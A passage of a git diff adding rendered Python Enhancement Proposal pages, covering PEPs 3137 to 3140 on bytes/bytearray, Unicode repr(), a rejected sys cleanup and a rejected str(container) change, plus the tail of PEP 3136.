I expect that this proposal will get rejected on the grounds of sheer +ugliness. However, it requires no changes to the language syntax +whatsoever, nor does it require any changes to existing Python +programs.

+
+
+
+

Implementation

+

I have never looked at the Python language implementation itself, so I +have no idea how difficult this would be to implement. If this PEP is +accepted, but no one is available to write the feature, I will try to +implement it myself.

+
+
+

Footnotes

+ +
+
+

Resources

+

This issue has come up before, although it has never been resolved, to +my knowledge.

+
    +
  • labeled breaks, on comp.lang.python, in the context of +do...while loops
  • +
  • break LABEL vs. exceptions + PROPOSAL, on python-list, as +compared to using Exceptions for flow control
  • +
  • Named code blocks on python-list, a suggestion motivated by the +desire for labeled break / continue
  • +
  • mod_python bug fix An example of someone setting a flag inside +an inner loop that triggers a continue in the containing loop, to +work around the absence of labeled break and continue
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3136.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3137/index.html b/pep-3137/index.html new file mode 100644 index 00000000000..6bd3e148060 --- /dev/null +++ b/pep-3137/index.html @@ -0,0 +1,417 @@ + + + + + + + + PEP 3137 – Immutable Bytes and Mutable Buffer | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3137 – Immutable Bytes and Mutable Buffer

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Sep-2007
+
Python-Version:
+
3.0
+
Post-History:
+
26-Sep-2007, 30-Sep-2007
+
+
+
+
Table of Contents +
+
+

Introduction

+

After releasing Python 3.0a1 with a mutable bytes type, pressure +mounted to add a way to represent immutable bytes. Gregory P. Smith +proposed a patch that would allow making a bytes object temporarily +immutable by requesting that the data be locked using the new buffer +API from PEP 3118. This did not seem the right approach to me.

+

Jeffrey Yasskin, with the help of Adam Hupp, then prepared a patch to +make the bytes type immutable (by crudely removing all mutating APIs) +and fix the fall-out in the test suite. This showed that there aren’t +all that many places that depend on the mutability of bytes, with the +exception of code that builds up a return value from small pieces.

+

Thinking through the consequences, and noticing that using the array +module as an ersatz mutable bytes type is far from ideal, and +recalling a proposal put forward earlier by Talin, I floated the +suggestion to have both a mutable and an immutable bytes type. (This +had been brought up before, but until seeing the evidence of Jeffrey’s +patch I wasn’t open to the suggestion.)

+

Moreover, a possible implementation strategy became clear: use the old +PyString implementation, stripped down to remove locale support and +implicit conversions to/from Unicode, for the immutable bytes type, +and keep the new PyBytes implementation as the mutable bytes type.

+

The ensuing discussion made it clear that the idea is welcome but +needs to be specified more precisely. Hence this PEP.

+
+
+

Advantages

+

One advantage of having an immutable bytes type is that code objects +can use these. It also makes it possible to efficiently create hash +tables using bytes for keys; this may be useful when parsing protocols +like HTTP or SMTP which are based on bytes representing text.

+

Porting code that manipulates binary data (or encoded text) in Python +2.x will be easier using the new design than using the original 3.0 +design with mutable bytes; simply replace str with bytes and +change ‘…’ literals into b’…’ literals.

+
+
+

Naming

+

I propose the following type names at the Python level:

+
    +
  • bytes is an immutable array of bytes (PyString)
  • +
  • bytearray is a mutable array of bytes (PyBytes)
  • +
  • memoryview is a bytes view on another object (PyMemory)
  • +
+

The old type named buffer is so similar to the new type +memoryview, introduce by PEP 3118, that it is redundant. The rest +of this PEP doesn’t discuss the functionality of memoryview; it is +just mentioned here to justify getting rid of the old buffer type. +(An earlier version of this PEP proposed buffer as the new name +for PyBytes; in the end this name was deemed to confusing given the +many other uses of the word buffer.)

+

While eventually it makes sense to change the C API names, this PEP +maintains the old C API names, which should be familiar to all.

+
+

Summary

+

Here’s a simple ASCII-art table summarizing the type names in various +Python versions:

+
+--------------+-------------+------------+--------------------------+
+| C name       | 2.x    repr | 3.0a1 repr | 3.0a2               repr |
++--------------+-------------+------------+--------------------------+
+| PyUnicode    | unicode u'' | str     '' | str                   '' |
+| PyString     | str      '' | str8   s'' | bytes                b'' |
+| PyBytes      | N/A         | bytes  b'' | bytearray bytearray(b'') |
+| PyBuffer     | buffer      | buffer     | N/A                      |
+| PyMemoryView | N/A         | memoryview | memoryview         <...> |
++--------------+-------------+------------+--------------------------+
+
+
+
+
+
+

Literal Notations

+

The b’…’ notation introduced in Python 3.0a1 returns an immutable +bytes object, whatever variation is used. To create a mutable array +of bytes, use bytearray(b’…’) or bytearray([…]). The latter form +takes a list of integers in range(256).

+
+
+

Functionality

+
+

PEP 3118 Buffer API

+

Both bytes and bytearray implement the PEP 3118 buffer API. The bytes +type only implements read-only requests; the bytearray type allows +writable and data-locked requests as well. The element data type is +always ‘B’ (i.e. unsigned byte).

+
+
+

Constructors

+

There are four forms of constructors, applicable to both bytes and +bytearray:

+
    +
  • bytes(<bytes>), bytes(<bytearray>), bytearray(<bytes>), +bytearray(<bytearray>): simple copying constructors, with the +note that bytes(<bytes>) might return its (immutable) +argument, but bytearray(<bytearray>) always makes a copy.
  • +
  • bytes(<str>, <encoding>[, <errors>]), bytearray(<str>, +<encoding>[, <errors>]): encode a text string. Note that the +str.encode() method returns an immutable bytes object. The +<encoding> argument is mandatory; <errors> is optional. +<encoding> and <errors>, if given, must be str instances.
  • +
  • bytes(<memory view>), bytearray(<memory view>): construct +a bytes or bytearray object from anything that implements the PEP +3118 buffer API.
  • +
  • bytes(<iterable of ints>), bytearray(<iterable of ints>): +construct a bytes or bytearray object from a stream of integers in +range(256).
  • +
  • bytes(<int>), bytearray(<int>): construct a +zero-initialized bytes or bytearray object of a given length.
  • +
+
+
+

Comparisons

+

The bytes and bytearray types are comparable with each other and +orderable, so that e.g. b’abc’ == bytearray(b’abc’) < b’abd’.

+

Comparing either type to a str object for equality returns False +regardless of the contents of either operand. Ordering comparisons +with str raise TypeError. This is all conformant to the standard +rules for comparison and ordering between objects of incompatible +types.

+

(Note: in Python 3.0a1, comparing a bytes instance with a str +instance would raise TypeError, on the premise that this would catch +the occasional mistake quicker, especially in code ported from Python +2.x. However, a long discussion on the python-3000 list pointed out +so many problems with this that it is clearly a bad idea, to be rolled +back in 3.0a2 regardless of the fate of the rest of this PEP.)

+
+
+

Slicing

+

Slicing a bytes object returns a bytes object. Slicing a bytearray +object returns a bytearray object.

+

Slice assignment to a bytearray object accepts anything that +implements the PEP 3118 buffer API, or an iterable of integers in +range(256).

+
+
+

Indexing

+

Indexing bytes and bytearray returns small ints (like the bytes type in +3.0a1, and like lists or array.array(‘B’)).

+

Assignment to an item of a bytearray object accepts an int in +range(256). (To assign from a bytes sequence, use a slice +assignment.)

+
+
+

Str() and Repr()

+

The str() and repr() functions return the same thing for these +objects. The repr() of a bytes object returns a b’…’ style literal. +The repr() of a bytearray returns a string of the form “bytearray(b’…’)”.

+
+
+

Operators

+

The following operators are implemented by the bytes and bytearray +types, except where mentioned:

+
    +
  • b1 + b2: concatenation. With mixed bytes/bytearray operands, +the return type is that of the first argument (this seems arbitrary +until you consider how += works).
  • +
  • b1 += b2: mutates b1 if it is a bytearray object.
  • +
  • b * n, n * b: repetition; n must be an integer.
  • +
  • b *= n: mutates b if it is a bytearray object.
  • +
  • b1 in b2, b1 not in b2: substring test; b1 can be any +object implementing the PEP 3118 buffer API.
  • +
  • i in b, i not in b: single-byte membership test; i must +be an integer (if it is a length-1 bytes array, it is considered +to be a substring test, with the same outcome).
  • +
  • len(b): the number of bytes.
  • +
  • hash(b): the hash value; only implemented by the bytes type.
  • +
+

Note that the % operator is not implemented. It does not appear +worth the complexity.

+
+
+

Methods

+

The following methods are implemented by bytes as well as bytearray, with +similar semantics. They accept anything that implements the PEP 3118 +buffer API for bytes arguments, and return the same type as the object +whose method is called (“self”):

+
.capitalize(), .center(), .count(), .decode(), .endswith(),
+.expandtabs(), .find(), .index(), .isalnum(), .isalpha(), .isdigit(),
+.islower(), .isspace(), .istitle(), .isupper(), .join(), .ljust(),
+.lower(), .lstrip(), .partition(), .replace(), .rfind(), .rindex(),
+.rjust(), .rpartition(), .rsplit(), .rstrip(), .split(),
+.splitlines(), .startswith(), .strip(), .swapcase(), .title(),
+.translate(), .upper(), .zfill()
+
+
+

This is exactly the set of methods present on the str type in Python +2.x, with the exclusion of .encode(). The signatures and semantics +are the same too. However, whenever character classes like letter, +whitespace, lower case are used, the ASCII definitions of these +classes are used. (The Python 2.x str type uses the definitions from +the current locale, settable through the locale module.) The +.encode() method is left out because of the more strict definitions of +encoding and decoding in Python 3000: encoding always takes a Unicode +string and returns a bytes sequence, and decoding always takes a bytes +sequence and returns a Unicode string.

+

In addition, both types implement the class method .fromhex(), +which constructs an object from a string containing hexadecimal values +(with or without spaces between the bytes).

+

The bytearray type implements these additional methods from the +MutableSequence ABC (see PEP 3119):

+
+
.extend(), .insert(), .append(), .reverse(), .pop(), .remove().
+
+
+

Bytes and the Str Type

+

Like the bytes type in Python 3.0a1, and unlike the relationship +between str and unicode in Python 2.x, attempts to mix bytes (or +bytearray) objects and str objects without specifying an encoding will +raise a TypeError exception. (However, comparing bytes/bytearray and +str objects for equality will simply return False; see the section on +Comparisons above.)

+

Conversions between bytes or bytearray objects and str objects must +always be explicit, using an encoding. There are two equivalent APIs: +str(b, <encoding>[, <errors>]) is equivalent to +b.decode(<encoding>[, <errors>]), and +bytes(s, <encoding>[, <errors>]) is equivalent to +s.encode(<encoding>[, <errors>]).

+

There is one exception: we can convert from bytes (or bytearray) to str +without specifying an encoding by writing str(b). This produces +the same result as repr(b). This exception is necessary because +of the general promise that any object can be printed, and printing +is just a special case of conversion to str. There is however no +promise that printing a bytes object interprets the individual bytes +as characters (unlike in Python 2.x).

+

The str type currently implements the PEP 3118 buffer API. While this +is perhaps occasionally convenient, it is also potentially confusing, +because the bytes accessed via the buffer API represent a +platform-depending encoding: depending on the platform byte order and +a compile-time configuration option, the encoding could be UTF-16-BE, +UTF-16-LE, UTF-32-BE, or UTF-32-LE. Worse, a different implementation +of the str type might completely change the bytes representation, +e.g. to UTF-8, or even make it impossible to access the data as a +contiguous array of bytes at all. Therefore, the PEP 3118 buffer API +will be removed from the str type.

+
+
+

The basestring Type

+

The basestring type will be removed from the language. Code that +used to say isinstance(x, basestring) should be changed to use +isinstance(x, str) instead.

+
+
+

Pickling

+

Left as an exercise for the reader.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3137.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3138/index.html b/pep-3138/index.html new file mode 100644 index 00000000000..6dab6ab2b46 --- /dev/null +++ b/pep-3138/index.html @@ -0,0 +1,396 @@ + + + + + + + + PEP 3138 – String representation in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3138 – String representation in Python 3000

+
+
Author:
+
Atsuo Ishimoto <ishimoto at gembook.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-May-2008
+
Python-Version:
+
3.0
+
Post-History:
+
05-May-2008, 05-Jun-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new string representation form for Python 3000. +In Python prior to Python 3000, the repr() built-in function converted +arbitrary objects to printable ASCII strings for debugging and +logging. For Python 3000, a wider range of characters, based on the +Unicode standard, should be considered ‘printable’.

+
+
+

Motivation

+

The current repr() converts 8-bit strings to ASCII using following +algorithm.

+
    +
  • Convert CR, LF, TAB and ‘\’ to ‘\r’, ‘\n’, ‘\t’, ‘\\’.
  • +
  • Convert other non-printable characters(0x00-0x1f, 0x7f) and +non-ASCII characters (>= 0x80) to ‘\xXX’.
  • +
  • Backslash-escape quote characters (apostrophe, ‘) and add the quote +character at the beginning and the end.
  • +
+

For Unicode strings, the following additional conversions are done.

+
    +
  • Convert leading surrogate pair characters without trailing character +(0xd800-0xdbff, but not followed by 0xdc00-0xdfff) to ‘\uXXXX’.
  • +
  • Convert 16-bit characters (>= 0x100) to ‘\uXXXX’.
  • +
  • Convert 21-bit characters (>= 0x10000) and surrogate pair characters +to ‘\U00xxxxxx’.
  • +
+

This algorithm converts any string to printable ASCII, and repr() is +used as a handy and safe way to print strings for debugging or for +logging. Although all non-ASCII characters are escaped, this does not +matter when most of the string’s characters are ASCII. But for other +languages, such as Japanese where most characters in a string are not +ASCII, this is very inconvenient.

+

We can use print(aJapaneseString) to get a readable string, but we +don’t have a similar workaround for printing strings from collections +such as lists or tuples. print(listOfJapaneseStrings) uses repr() +to build the string to be printed, so the resulting strings are always +hex-escaped. Or when open(japaneseFilename) raises an exception, +the error message is something like IOError: [Errno 2] No such file +or directory: '\u65e5\u672c\u8a9e', which isn’t helpful.

+

Python 3000 has a lot of nice features for non-Latin users such as +non-ASCII identifiers, so it would be helpful if Python could also +progress in a similar way for printable output.

+

Some users might be concerned that such output will mess up their +console if they print binary data like images. But this is unlikely +to happen in practice because bytes and strings are different types in +Python 3000, so printing an image to the console won’t mess it up.

+

This issue was once discussed by Hye-Shik Chang [1], but was rejected.

+
+
+

Specification

+
    +
  • Add a new function to the Python C API int Py_UNICODE_ISPRINTABLE +(Py_UNICODE ch). This function returns 0 if repr() should escape +the Unicode character ch; otherwise it returns 1. Characters +that should be escaped are defined in the Unicode character database +as:
      +
    • Cc (Other, Control)
    • +
    • Cf (Other, Format)
    • +
    • Cs (Other, Surrogate)
    • +
    • Co (Other, Private Use)
    • +
    • Cn (Other, Not Assigned)
    • +
    • Zl (Separator, Line), refers to LINE SEPARATOR (’\u2028’).
    • +
    • Zp (Separator, Paragraph), refers to PARAGRAPH SEPARATOR +(’\u2029’).
    • +
    • Zs (Separator, Space) other than ASCII space (’\x20’). Characters +in this category should be escaped to avoid ambiguity.
    • +
    +
  • +
  • The algorithm to build repr() strings should be changed to:
      +
    • Convert CR, LF, TAB and ‘\’ to ‘\r’, ‘\n’, ‘\t’, ‘\\’.
    • +
    • Convert non-printable ASCII characters (0x00-0x1f, 0x7f) to +‘\xXX’.
    • +
    • Convert leading surrogate pair characters without trailing +character (0xd800-0xdbff, but not followed by 0xdc00-0xdfff) to +‘\uXXXX’.
    • +
    • Convert non-printable characters (Py_UNICODE_ISPRINTABLE() returns +0) to ‘\xXX’, ‘\uXXXX’ or ‘\U00xxxxxx’.
    • +
    • Backslash-escape quote characters (apostrophe, 0x27) and add a +quote character at the beginning and the end.
    • +
    +
  • +
  • Set the Unicode error-handler for sys.stderr to ‘backslashreplace’ +by default.
  • +
  • Add a new function to the Python C API PyObject *PyObject_ASCII +(PyObject *o). This function converts any python object to a +string using PyObject_Repr() and then hex-escapes all non-ASCII +characters. PyObject_ASCII() generates the same string as +PyObject_Repr() in Python 2.
  • +
  • Add a new built-in function, ascii(). This function converts +any python object to a string using repr() and then hex-escapes all +non-ASCII characters. ascii() generates the same string as +repr() in Python 2.
  • +
  • Add a '%a' string format operator. '%a' converts any python +object to a string using repr() and then hex-escapes all non-ASCII +characters. The '%a' format operator generates the same string +as '%r' in Python 2. Also, add '!a' conversion flags to the +string.format() method and add '%A' operator to the +PyUnicode_FromFormat(). They convert any object to an ASCII string +as '%a' string format operator.
  • +
  • Add an isprintable() method to the string type. +str.isprintable() returns False if repr() would escape any +character in the string; otherwise returns True. The +isprintable() method calls the Py_UNICODE_ISPRINTABLE() +function internally.
  • +
+
+
+

Rationale

+

The repr() in Python 3000 should be Unicode, not ASCII based, just +like Python 3000 strings. Also, conversion should not be affected by +the locale setting, because the locale is not necessarily the same as +the output device’s locale. For example, it is common for a daemon +process to be invoked in an ASCII setting, but writes UTF-8 to its log +files. Also, web applications might want to report the error +information in more readable form based on the HTML page’s encoding.

+

Characters not supported by the user’s console could be hex-escaped on +printing, by the Unicode encoder’s error-handler. If the +error-handler of the output file is ‘backslashreplace’, such +characters are hex-escaped without raising UnicodeEncodeError. For +example, if the default encoding is ASCII, print('Hello ¢') will +print ‘Hello \xa2’. If the encoding is ISO-8859-1, ‘Hello ¢’ will be +printed.

+

The default error-handler for sys.stdout is ‘strict’. Other +applications reading the output might not understand hex-escaped +characters, so unsupported characters should be trapped when writing. +If unsupported characters must be escaped, the error-handler should be +changed explicitly. Unlike sys.stdout, sys.stderr doesn’t raise +UnicodeEncodingError by default, because the default error-handler is +‘backslashreplace’. So printing error messages containing non-ASCII +characters to sys.stderr will not raise an exception. Also, +information about uncaught exceptions (exception object, traceback) is +printed by the interpreter without raising exceptions.

+
+

Alternate Solutions

+

To help debugging in non-Latin languages without changing repr(), +other suggestions were made.

+
    +
  • Supply a tool to print lists or dicts.

    Strings to be printed for debugging are not only contained by lists +or dicts, but also in many other types of object. File objects +contain a file name in Unicode, exception objects contain a message +in Unicode, etc. These strings should be printed in readable form +when repr()ed. It is unlikely to be possible to implement a tool to +print all possible object types.

    +
  • +
  • Use sys.displayhook and sys.excepthook.

    For interactive sessions, we can write hooks to restore hex escaped +characters to the original characters. But these hooks are called +only when printing the result of evaluating an expression entered in +an interactive Python session, and don’t work for the print() +function, for non-interactive sessions or for logging.debug("%r", +...), etc.

    +
  • +
  • Subclass sys.stdout and sys.stderr.

    It is difficult to implement a subclass to restore hex-escaped +characters since there isn’t enough information left by the time +it’s a string to undo the escaping correctly in all cases. For +example, print("\\"+"u0041") should be printed as ‘\u0041’, not +‘A’. But there is no chance to tell file objects apart.

    +
  • +
  • Make the encoding used by unicode_repr() adjustable, and make the +existing repr() the default.

    With adjustable repr(), the result of using repr() is unpredictable +and would make it impossible to write correct code involving repr(). +And if current repr() is the default, then the old convention +remains intact and users may expect ASCII strings as the result of +repr(). Third party applications or libraries could be confused +when a custom repr() function is used.

    +
  • +
+
+
+
+

Backwards Compatibility

+

Changing repr() may break some existing code, especially testing code. +Five of Python’s regression tests fail with this modification. If you +need repr() strings without non-ASCII character as Python 2, you can +use the following function.

+
def repr_ascii(obj):
+    return str(repr(obj).encode("ASCII", "backslashreplace"), "ASCII")
+
+
+

For logging or for debugging, the following code can raise +UnicodeEncodeError.

+
log = open("logfile", "w")
+log.write(repr(data))     # UnicodeEncodeError will be raised
+                          # if data contains unsupported characters.
+
+
+

To avoid exceptions being raised, you can explicitly specify the +error-handler.

+
log = open("logfile", "w", errors="backslashreplace")
+log.write(repr(data))  # Unsupported characters will be escaped.
+
+
+

For a console that uses a Unicode-based encoding, for example, +en_US.utf8 or de_DE.utf8, the backslashreplace trick doesn’t work and +all printable characters are not escaped. This will cause a problem +of similarly drawing characters in Western, Greek and Cyrillic +languages. These languages use similar (but different) alphabets +(descended from a common ancestor) and contain letters that look +similar but have different character codes. For example, it is hard +to distinguish Latin ‘a’, ‘e’ and ‘o’ from Cyrillic ‘а’, ‘е’ and ‘о’. +(The visual representation, of course, very much depends on the fonts +used but usually these letters are almost indistinguishable.) To +avoid the problem, the user can adjust the terminal encoding to get a +result suitable for their environment.

+
+
+

Rejected Proposals

+
    +
  • Add encoding and errors arguments to the builtin print() function, +with defaults of sys.getfilesystemencoding() and ‘backslashreplace’.

    Complicated to implement, and in general, this is not seen as a good +idea. [2]

    +
  • +
  • Use character names to escape characters, instead of hex character +codes. For example, repr('\u03b1') can be converted to +"\N{GREEK SMALL LETTER ALPHA}".

    Using character names can be very verbose compared to hex-escape. +e.g., repr("\ufbf9") is converted to "\N{ARABIC LIGATURE +UIGHUR KIRGHIZ YEH WITH HAMZA ABOVE WITH ALEF MAKSURA ISOLATED +FORM}".

    +
  • +
  • Default error-handler of sys.stdout should be ‘backslashreplace’.

    Stuff written to stdout might be consumed by another program that +might misinterpret the \ escapes. For interactive sessions, it is +possible to make the ‘backslashreplace’ error-handler the default, +but this may add confusion of the kind “it works in interactive mode +but not when redirecting to a file”.

    +
  • +
+
+
+

Implementation

+

The author wrote a patch in http://bugs.python.org/issue2630; this was +committed to the Python 3.0 branch in revision 64138 on 06-11-2008.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3138.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3139/index.html b/pep-3139/index.html new file mode 100644 index 00000000000..1b7a93fef4e --- /dev/null +++ b/pep-3139/index.html @@ -0,0 +1,307 @@ + + + + + + + + PEP 3139 – Cleaning out sys and the “interpreter” module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3139 – Cleaning out sys and the “interpreter” module

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Apr-2008
+
Python-Version:
+
3.0
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

Guido’s -0.5 put an end to this PEP. See +https://mail.python.org/pipermail/python-3000/2008-April/012977.html.

+
+
+

Abstract

+

This PEP proposes a new low-level module for CPython-specific interpreter +functions in order to clean out the sys module and separate general Python +functionality from implementation details.

+
+
+

Rationale

+

The sys module currently contains functions and data that can be put into two +major groups:

+
    +
  1. Data and functions that are available in all Python implementations and deal +with the general running of a Python virtual machine.
      +
    • argv
    • +
    • byteorder
    • +
    • path, path_hooks, meta_path, path_importer_cache, and modules
    • +
    • copyright, hexversion, version, and version_info
    • +
    • displayhook, __displayhook__
    • +
    • excepthook, __excepthook__, exc_info, and exc_clear
    • +
    • exec_prefix and prefix
    • +
    • executable
    • +
    • exit
    • +
    • flags, py3kwarning, dont_write_bytecode, and warn_options
    • +
    • getfilesystemencoding
    • +
    • get/setprofile
    • +
    • get/settrace, call_tracing
    • +
    • getwindowsversion
    • +
    • maxint and maxunicode
    • +
    • platform
    • +
    • ps1 and ps2
    • +
    • stdin, stderr, stdout, __stdin__, __stderr__, __stdout__
    • +
    • tracebacklimit
    • +
    +
  2. +
  3. Data and functions that affect the CPython interpreter.
      +
    • get/setrecursionlimit
    • +
    • get/setcheckinterval
    • +
    • _getframe and _current_frame
    • +
    • getrefcount
    • +
    • get/setdlopenflags
    • +
    • settscdumps
    • +
    • api_version
    • +
    • winver
    • +
    • dllhandle
    • +
    • float_info
    • +
    • _compact_freelists
    • +
    • _clear_type_cache
    • +
    • subversion
    • +
    • builtin_module_names
    • +
    • callstats
    • +
    • intern
    • +
    +
  4. +
+

The second collections of items has been steadily increasing over the years +causing clutter in sys. Guido has even said he doesn’t recognize some of things +in it [1]!

+

Moving these items off to another module would send a clear message to +other Python implementations about what functions need and need not be +implemented.

+

It has also been proposed that the contents of types module be distributed +across the standard library [2]; the interpreter module would +provide an excellent resting place for internal types like frames and code +objects.

+
+
+

Specification

+

A new builtin module named “interpreter” (see Naming) will be added.

+

The second list of items above will be split into the stdlib as follows:

+
+
The interpreter module
    +
  • get/setrecursionlimit
  • +
  • get/setcheckinterval
  • +
  • _getframe and _current_frame
  • +
  • get/setdlopenflags
  • +
  • settscdumps
  • +
  • api_version
  • +
  • winver
  • +
  • dllhandle
  • +
  • float_info
  • +
  • _clear_type_cache
  • +
  • subversion
  • +
  • builtin_module_names
  • +
  • callstats
  • +
  • intern
  • +
+
+
The gc module:
    +
  • getrefcount
  • +
  • _compact_freelists
  • +
+
+
+
+
+

Transition Plan

+

Once implemented in 3.x, the interpreter module will be back-ported to 2.6. +Py3k warnings will be added to the sys functions it replaces.

+
+
+

Open Issues

+
+

What should move?

+
+

dont_write_bytecode

+

Some believe that the writing of bytecode is an implementation detail and should +be moved [3]. The counterargument is that all current, complete +Python implementations do write some sort of bytecode, so it is valuable to be +able to disable it. Also, if it is moved, some wish to put it in the imp +module.

+
+
+
+

Move to some to imp?

+

It was noted that dont_write_bytecode or maybe builtin_module_names might fit +nicely in the imp module.

+
+
+

Naming

+

The author proposes the name “interpreter” for the new module. “pyvm” has also +been suggested [4]. The name “cpython” was well liked +[5].

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3139.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3140/index.html b/pep-3140/index.html new file mode 100644 index 00000000000..26ef272275e --- /dev/null +++ b/pep-3140/index.html @@ -0,0 +1,322 @@ + + + + + + + + PEP 3140 – str(container) should call str(item), not repr(item) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3140 – str(container) should call str(item), not repr(item)

+
+
Author:
+
Oleg Broytman <phd at phdru.name>, +Jim J. Jewett <jimjjewett at gmail.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
27-May-2008
+
Post-History:
+
28-May-2008
+
+
+
+
Table of Contents +
+
+

Rejection

+

Guido said this would cause too much disturbance too close to beta. See [1].

+
+
+

Abstract

+

This document discusses the advantages and disadvantages of the +current implementation of str(container). It also discusses the +pros and cons of a different approach - to call str(item) instead +of repr(item).

+
+
+

Motivation

+

Currently str(container) calls repr on items. Arguments for it:

+
    +
  • containers refuse to guess what the user wants to see on +str(container) - surroundings, delimiters, and so on;
  • +
  • repr(item) usually displays type information - apostrophes +around strings, class names, etc.
  • +
+

Arguments against:

+
    +
  • it’s illogical; str() is expected to call __str__ if it exists, +not __repr__;
  • +
  • there is no standard way to print a container’s content calling +items’ __str__, that’s inconvenient in cases where __str__ and +__repr__ return different results;
  • +
  • repr(item) sometimes do wrong things (hex-escapes non-ASCII strings, +e.g.)
  • +
+

This PEP proposes to change how str(container) works. It is +proposed to mimic how repr(container) works except one detail - call +str on items instead of repr. This allows a user to choose +what results she want to get - from item.__repr__ or item.__str__.

+
+
+

Current situation

+

Most container types (tuples, lists, dicts, sets, etc.) do not +implement __str__ method, so str(container) calls +container.__repr__, and container.__repr__, once called, forgets +it is called from str and always calls repr on the container’s +items.

+

This behaviour has advantages and disadvantages. One advantage is +that most items are represented with type information - strings +are surrounded by apostrophes, instances may have both class name +and instance data:

+
>>> print([42, '42'])
+[42, '42']
+>>> print([Decimal('42'), datetime.now()])
+[Decimal("42"), datetime.datetime(2008, 5, 27, 19, 57, 43, 485028)]
+
+
+

The disadvantage is that __repr__ often returns technical data +(like ‘<object at address>’) or unreadable string (hex-encoded +string if the input is non-ASCII string):

+
>>> print(['тест'])
+['\xd4\xc5\xd3\xd4']
+
+
+

One of the motivations for PEP 3138 is that neither repr nor str +will allow the sensible printing of dicts whose keys are non-ASCII +text strings. Now that Unicode identifiers are allowed, it +includes Python’s own attribute dicts. This also includes JSON +serialization (and caused some hoops for the json lib).

+

PEP 3138 proposes to fix this by breaking the “repr is safe ASCII” +invariant, and changing the way repr (which is used for +persistence) outputs some objects, with system-dependent failures.

+

Changing how str(container) works would allow easy debugging in +the normal case, and retain the safety of ASCII-only for the +machine-readable case. The only downside is that str(x) and +repr(x) would more often be different – but only in those cases +where the current almost-the-same version is insufficient.

+

It also seems illogical that str(container) calls repr on items +instead of str. It’s only logical to expect following code:

+
class Test:
+    def __str__(self):
+        return "STR"
+
+    def __repr__(self):
+        return "REPR"
+
+
+test = Test()
+print(test)
+print(repr(test))
+print([test])
+print(str([test]))
+
+
+

to print:

+
STR
+REPR
+[STR]
+[STR]
+
+
+

where it actually prints:

+
STR
+REPR
+[REPR]
+[REPR]
+
+
+

Especially it is illogical to see that print in Python 2 uses str +if it is called on what seems to be a tuple:

+
>>> print Decimal('42'), datetime.now()
+42 2008-05-27 20:16:22.534285
+
+
+

where on an actual tuple it prints:

+
>>> print((Decimal('42'), datetime.now()))
+(Decimal("42"), datetime.datetime(2008, 5, 27, 20, 16, 27, 937911))
+
+
+
+
+

A different approach - call str(item)

+

For example, with numbers it is often only the value that people +care about.

+
>>> print Decimal('3')
+3
+
+
+

But putting the value in a list forces users to read the type +information, exactly as if repr had been called for the benefit of +a machine:

+
>>> print [Decimal('3')]
+[Decimal("3")]
+
+
+

After this change, the type information would not clutter the str +output:

+
>>> print "%s".format([Decimal('3')])
+[3]
+>>> str([Decimal('3')])  # ==
+[3]
+
+
+

But it would still be available if desired:

+
>>> print "%r".format([Decimal('3')])
+[Decimal('3')]
+>>> repr([Decimal('3')])  # ==
+[Decimal('3')]
+
+
+

There is a number of strategies to fix the problem. The most +radical is to change __repr__ so it accepts a new parameter (flag) +“called from str, so call str on items, not repr”. The +drawback of the proposal is that every __repr__ implementation +must be changed. Introspection could help a bit (inspect __repr__ +before calling if it accepts 2 or 3 parameters), but introspection +doesn’t work on classes written in C, like all built-in containers.

+

Less radical proposal is to implement __str__ methods for built-in +container types. The obvious drawback is a duplication of effort - all +those __str__ and __repr__ implementations are only differ +in one small detail - if they call str or repr on items.

+

The most conservative proposal is not to change str at all but +to allow developers to implement their own application- or +library-specific pretty-printers. The drawback is again +a multiplication of effort and proliferation of many small +specific container-traversal algorithms.

+
+
+

Backward compatibility

+

In those cases where type information is more important than +usual, it will still be possible to get the current results by +calling repr explicitly.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3140.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
